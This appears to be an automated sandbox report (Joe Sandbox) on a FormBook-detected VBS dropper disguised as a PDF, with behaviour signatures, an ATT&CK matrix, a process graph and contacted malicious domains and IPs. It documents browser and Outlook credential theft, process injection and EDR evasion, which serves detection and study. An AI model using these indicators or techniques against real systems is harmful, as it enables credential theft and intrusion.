              Source: FUrHThL4lQ4AVjnAsevEg.exe, 0000001C.00000002.2466268996.00000000012A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: FUrHThL4lQ4AVjnAsevEg.exe, 0000001C.00000002.2466268996.00000000012A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: FUrHThL4lQ4AVjnAsevEg.exe, 0000001C.00000002.2466268996.00000000012A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0000001E.00000002.2467721124.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2463661384.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2467865080.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.2467491077.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2469446564.00000000055D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2181502037.0000000023810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2182064496.00000000265D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0000001E.00000002.2467721124.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2463661384.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2467865080.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.2467491077.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2469446564.00000000055D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2181502037.0000000023810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2182064496.00000000265D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		1
              Abuse Elevation Control Mechanism              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		2
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		LSASS Memory124
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)512
              Process Injection              		4
              Obfuscated Files or Information              		Security Account Manager131
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Software Packing              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets41
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
              Virtualization/Sandbox Evasion              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
              Process Injection              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634248 Sample: U00b7pdf.vbs Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 50 www.natividade.tech 2->50 52 www.matrixfitness.org 2->52 54 4 other IPs or domains 2->54 72 Suricata IDS alerts for network traffic 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 7 other signatures 2->78 10 powershell.exe 15 2->10         started        13 wscript.exe 1 2->13         started        15 svchost.exe 1 1 2->15         started        signatures3 process4 dnsIp5 94 Early bird code injection technique detected 10->94 96 Writes to foreign memory regions 10->96 98 Found suspicious powershell code related to unpacking or dynamic code loading 10->98 100 Queues an APC in another process (thread injection) 10->100 18 dxdiag.exe 6 10->18         started        22 conhost.exe 10->22         started        24 msiexec.exe 10->24         started        30 10 other processes 10->30 102 VBScript performs obfuscated calls to suspicious functions 13->102 104 Suspicious powershell command line found 13->104 106 Wscript starts Powershell (via cmd or directly) 13->106 108 2 other signatures 13->108 26 powershell.exe 14 20 13->26         started        28 PING.EXE 1 13->28         started        66 127.0.0.1 unknown unknown 15->66 signatures6 process7 dnsIp8 56 172.217.23.110, 443, 49732 GOOGLEUS United States 18->56 80 Maps a DLL or memory area into another process 18->80 82 Switches to a custom stack to bypass stack traces 18->82 32 FUrHThL4lQ4AVjnAsevEg.exe 18->32 injected 58 drive.google.com 142.250.184.206, 443, 49721, 49726 GOOGLEUS United States 26->58 60 drive.usercontent.google.com 216.58.206.33, 443, 49723, 49728 GOOGLEUS United States 26->60 84 Found suspicious powershell code related to unpacking or dynamic code loading 26->84 35 conhost.exe 26->35         started        37 conhost.exe 28->37         started        signatures9 process10 signatures11 68 Maps a DLL or memory area into another process 32->68 70 Found direct / indirect Syscall (likely to bypass EDR) 32->70 39 findstr.exe 13 32->39         started        42 poqexec.exe 32->42         started        process12 signatures13 86 Tries to steal Mail credentials (via file / registry access) 39->86 88 Tries to harvest and steal browser information (history, passwords, etc) 39->88 90 Modifies the context of a thread in another process (thread injection) 39->90 92 2 other signatures 39->92 44 FUrHThL4lQ4AVjnAsevEg.exe 39->44 injected 48 firefox.exe 39->48         started        process14 dnsIp15 62 natividade.tech 84.32.84.32, 49735, 49736, 80 NTT-LT-ASLT Lithuania 44->62 64 www.matrixfitness.org 13.248.169.48, 49734, 80 AMAZON-02US United States 44->64 110 Found direct / indirect Syscall (likely to bypass EDR) 44->110 signatures16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              U00b7pdf.vbs13%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://drive.usercontent.google.com60%Avira URL Cloudsafe
              http://crl.microzx0%Avira URL Cloudsafe
              http://www.matrixfitness.org/mkxv/?_DxX9=GvGhRTQ8xnaToFmp&Sd=MK0ShD/VOT+mjwSTsaVeU6cpgDJma41hUarXaHeYlCN0x3qiLyvXgNTQnyE27cakbqtkm7ZzmuQjHRMwfybJg8/uVAzxxb2bWCipVm1F5XK7hvnY5T76PUQ=0%Avira URL Cloudsafe
              http://www.natividade.tech/3szq/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              natividade.tech
              		84.32.84.32
              		truetrue
                		unknown
                bg.microsoft.map.fastly.net
                		199.232.214.172
                		truefalse
                  		high
                  drive.google.com
                  		142.250.184.206
                  		truefalse
                    		high
                    drive.usercontent.google.com
                    		216.58.206.33
                    		truefalse
                      		high
                      www.matrixfitness.org
                      		13.248.169.48
                      		truetrue
                        		unknown
                        Host_6637.6637.6637.657e
                        		unknown
                        		unknownfalse
                          		high
                          www.natividade.tech
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.natividade.tech/3szq/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.matrixfitness.org/mkxv/?_DxX9=GvGhRTQ8xnaToFmp&Sd=MK0ShD/VOT+mjwSTsaVeU6cpgDJma41hUarXaHeYlCN0x3qiLyvXgNTQnyE27cakbqtkm7ZzmuQjHRMwfybJg8/uVAzxxb2bWCipVm1F5XK7hvnY5T76PUQ=true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://drive.googpowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.google.com/uc?expowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microzxpowershell.exe, 0000000C.00000002.1813807750.00000000031A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive.google.com/upowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.microsoft.copowershell.exe, 00000003.00000002.1461444403.00000223A7EF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.ver)svchost.exe, 00000005.00000002.2470781353.000001FDE9C8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000005.00000003.1205804911.000001FDE9A43000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1205804911.000001FDE9A88000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1205804911.000001FDE9AA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1205804911.000001FDE9A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercontent.google.com6powershell.exe, 00000003.00000002.1417163022.000002238FF8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://drive.google.powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.gopowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.goopowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000005.00000003.1205804911.000001FDE9A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.compowershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.gpowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000005.00000003.1205804911.000001FDE9A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.google.com/ucpowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000005.00000003.1205804911.000001FDE9A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 0000000C.00000002.1816297065.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://drive.google.com/powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2166177608.0000000007EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.googlpowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.google.com/uc?epowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1451665041.000002239FB60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.compowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417163022.000002238FD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://drive.google.cpowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.1417163022.000002238FAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://apis.google.compowershell.exe, 00000003.00000002.1417163022.000002238FF8A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1934699679.0000000007F33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://drive.google.com/yXdxdiag.exe, 00000019.00000002.2166177608.0000000007EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://drive.google.com/uc?powershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1417163022.000002238FAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1816297065.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000005.00000003.1205804911.000001FDE9A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://drive.googlepowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive.google.copowershell.exe, 00000003.00000002.1417163022.0000022391219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      172.217.23.110
                                                                                                      		unknownUnited States
                                                                                                      		15169GOOGLEUSfalse
                                                                                                      13.248.169.48
                                                                                                      		www.matrixfitness.orgUnited States
                                                                                                      		16509AMAZON-02UStrue
                                                                                                      216.58.206.33
                                                                                                      		drive.usercontent.google.comUnited States
                                                                                                      		15169GOOGLEUSfalse
                                                                                                      84.32.84.32
                                                                                                      		natividade.techLithuania
                                                                                                      		33922NTT-LT-ASLTtrue
                                                                                                      142.250.184.206
                                                                                                      		drive.google.comUnited States
                                                                                                      		15169GOOGLEUSfalse

                                                                                                      Private

                                                                                                      IP
                                                                                                      127.0.0.1

                                                                                                      General Information

                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1634248
                                                                                                      Start date and time:2025-03-10 21:10:23 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 1s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:32
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:2
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:U00b7pdf.vbs
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name: (GTU) 03-10-2025pdf.vbs
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@40/14@6/6
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 40%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 92%
                                                                                                      • Number of executed functions: 138
                                                                                                      • Number of non-executed functions: 182
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .vbs

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.60.203.209, 172.202.163.200
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target FUrHThL4lQ4AVjnAsevEg.exe, PID 6164 because it is empty
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 4344 because it is empty
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7436 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      16:11:21API Interceptor1x Sleep call for process: wscript.exe modified
